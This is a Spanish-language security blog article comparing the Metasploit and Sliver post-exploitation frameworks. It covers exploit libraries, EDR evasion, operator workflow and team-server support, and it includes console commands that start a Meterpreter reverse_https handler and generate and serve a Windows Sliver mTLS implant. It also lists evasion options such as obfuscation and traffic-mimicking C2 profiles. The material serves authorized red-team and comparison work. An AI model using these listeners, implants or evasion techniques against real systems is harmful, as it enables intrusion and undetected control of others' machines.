Skip to content
Breachfolio
Ilustración principal de: Metasploit vs Sliver: frameworks de post-explotación en 2026.
C2 COMPARATIVAS

Metasploit vs Sliver: frameworks de post-explotación en 2026.

Un clásico que envejece frente al retador moderno nativo en Go. Biblioteca de exploits, ergonomía de listeners y cómo sobrevive cada uno a un EDR bien afinado.

11 min de lectura Breachfolio Research

Metasploit Framework ha sido la herramienta de post-explotación canónica desde 2003. Sliver, el C2 open source nativo en Go de BishopFox, ha sido la respuesta canónica al «el EDR por fin pilla a MSF» desde 2020. En 2026 ambos están ampliamente desplegados, y la elección entre ellos no es la que era ni siquiera hace dos años.

Para qué es bueno cada uno

Caso de usoElección
CTF, formación, máquinas vulnerables de laboratorioMetasploit
Pentest interno con EDR maduro en los endpointsSliver
Engagement de red team que exige sigiloSliver
Prueba de concepto rápida para un CVE recién salidoMetasploit (los módulos llegan rápido)
Operar sobre objetivos Linux, Windows y macOSSliver (mejor multiplataforma)
Team server / multi-operadorSliver

Biblioteca de exploits

Aquí Metasploit sigue sin rival, y probablemente siempre lo estará. Es la mayor colección pública y curada de exploits funcionales, con más de 2.300 módulos en la versión 2026.1. Los CVE nuevos aterrizan en días para los más populares.

Sliver no tiene biblioteca de exploits. Y no pretende tenerla. Es un framework de C2: su trabajo empieza después del punto de apoyo inicial. Los dos no son competidores directos en esta fase de la kill chain; solo se solapan en la post-explotación, donde Sliver tiene la ventaja.

Detección: cómo sobrevive cada uno

El clásico payload de Meterpreter generado con msfvenom lo reconoce cualquier antivirus y EDR de mercado. Lleva años siendo así. Todavía puedes usar Metasploit operativamente —mediante encoders personalizados, payloads por etapas, loaders en memoria, BOFs— pero evadir un EDR afinado es trabajo de verdad.

Los implants de Sliver son binarios en Go que no comparten firma con nada en la nube del antivirus. El perfil por defecto no es invisible —la generación del implant produce un binario que cualquier EDR razonable ya ha aprendido— pero la superficie para personalizar es más amplia:

  • Ofuscación en tiempo de compilación con --obfuscate (renombra funciones, deforma cadenas).
  • Varios protocolos de transporte integrados: mTLS, HTTPS, DNS, Wireguard.
  • Perfiles de C2 personalizados que imitan los patrones de tráfico de aplicaciones reales.
  • El loader de segunda etapa puede ser un shellcode, un ejecutable, una biblioteca compartida o una DLL de servicio.

En nuestro laboratorio, con CrowdStrike Falcon y Microsoft Defender for Endpoint afinados a políticas de producción estándar, una sesión de Meterpreter por defecto duró menos de 30 segundos. Una sesión de Sliver por defecto duró lo suficiente para hacer trabajo real; una sesión de Sliver personalizada pasó desapercibida durante un engagement completo de ocho horas.

Experiencia del operador

Metasploit

$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST 10.0.0.1
msf6 exploit(multi/handler) > set LPORT 8443
msf6 exploit(multi/handler) > run

Familiar para cualquier pentester que lleve trabajando más de cinco minutos. Explorable con autocompletado por tabulador, predecible, lento de arrancar (5–10 segundos para que cargue msfconsole).

Sliver

$ sliver
sliver > profiles new --mtls 10.0.0.1:8443 --format exe --os windows --arch amd64 win-mtls
sliver > generate --profile win-mtls --save ./impl.exe
sliver > mtls --lhost 10.0.0.1 --lport 8443

Misma forma, distinto vocabulario. Sliver piensa en términos de perfiles (una configuración de implant reutilizable) y jobs (listeners en ejecución). Una vez interiorizas el modelo, generar un implant nuevo es una sola línea.

Multi-operador / team server

El msgrpc de Metasploit funciona, pero se nota añadido a posteriori. El flujo esperado es un operador por consola. Hay apaños (msfrpcd, wrappers al estilo de Cobalt Strike) pero ninguno es de primera clase.

Sliver se diseñó multi-operador desde el primer día. El servidor se ejecuta una vez, varios clientes operadores se conectan por mTLS, y el estado compartido —implants, jobs, historial— es lo predeterminado.

Licencia y consideraciones de cadena de suministro

Ambos son open source: Metasploit con licencia estilo BSD, Sliver con GPLv3. Ninguno exige pago por su uso. Existe Metasploit Pro (comercial), pero el framework es la parte que todo el mundo usa de verdad.

Ambos han sido usados como arma por grupos criminales; ambos tienen firmas de detección en todos los EDR importantes. Usar cualquiera de los dos en un engagement real exige autorización por escrito. El sigilo de Sliver no sustituye a un documento de reglas de enfrentamiento.

La recomendación

Para aprender, para CTFs, para «solo necesito un punto de apoyo en esta máquina vulnerable»: Metasploit. Nada más tiene ese catálogo de exploits y nada más se enseña tanto.

Para engagements modernos de red team, sobre todo internos contra un blue team maduro: Sliver. La diferencia de detección respecto al Meterpreter por defecto es real, y el diseño multi-operador es justo lo que quieres cuando en un engagement hay más de una persona.

La mayoría de los equipos acaban usando ambos: Metasploit para el acceso inicial, Sliver para todo lo posterior. No es una bifurcación en el camino; es una tubería.